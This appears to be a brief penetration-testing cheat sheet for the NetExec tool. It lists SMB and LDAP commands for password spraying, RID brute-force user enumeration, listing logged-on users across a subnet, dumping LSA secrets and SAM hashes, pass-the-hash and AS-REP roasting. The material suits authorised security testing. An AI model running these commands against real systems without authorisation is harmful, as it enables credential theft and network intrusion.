https://www.netexec.wiki/ - `nxc` = `netexec` . It is just the shortened command name for convenience - netexec can also be used for other protocols such as SMB, LDAP, MSSQL and others. ### Installing NetExec ```bash sudo apt-get -y install netexec ``` ### Usage ```bash nxc smb $IP -u $USER -p $PWD nxc smb $IP -u $USER -p $PWD --shares nxc smb $IP -u $USER_FILE -p $PWD_FILE nxc smb $IP -u $USER_FILE -p $PWD_FILE --continue-on-success nxc smb $IP -u $USER_FILE -p $PWD_FILE --rid-brute nxc smb $IP -u $USER_FILE -p $PWD_FILE --rid-brute | grep SidTypeUser # if targeting a non-domain joined computer nxc smb $IP -u $USER -p $PWD --local-auth --continue-on-success # Enumerating logged-on users in a network nxc smb 10.10.110.0/24 -u $USER -p $PWD --logged-on-users # HASH DUMP nxc smb $IP -u $USER -p $PWD --lsa nxc smb $IP -u $USER -p $PWD --sam # Pass the Hash nxc smb $IP -u $USER -H $HASH # AS-REP ROASTING nxc ldap -dc-ip $IP -u $USER -p '' --asreproast asreproast.out nxc ldap -dc-ip $IP -u $USER -p $PWD --asreproast asreproast.out # ADCS nxc ldap -dc-ip $IP -u $USER -p $PWD -M adcs ```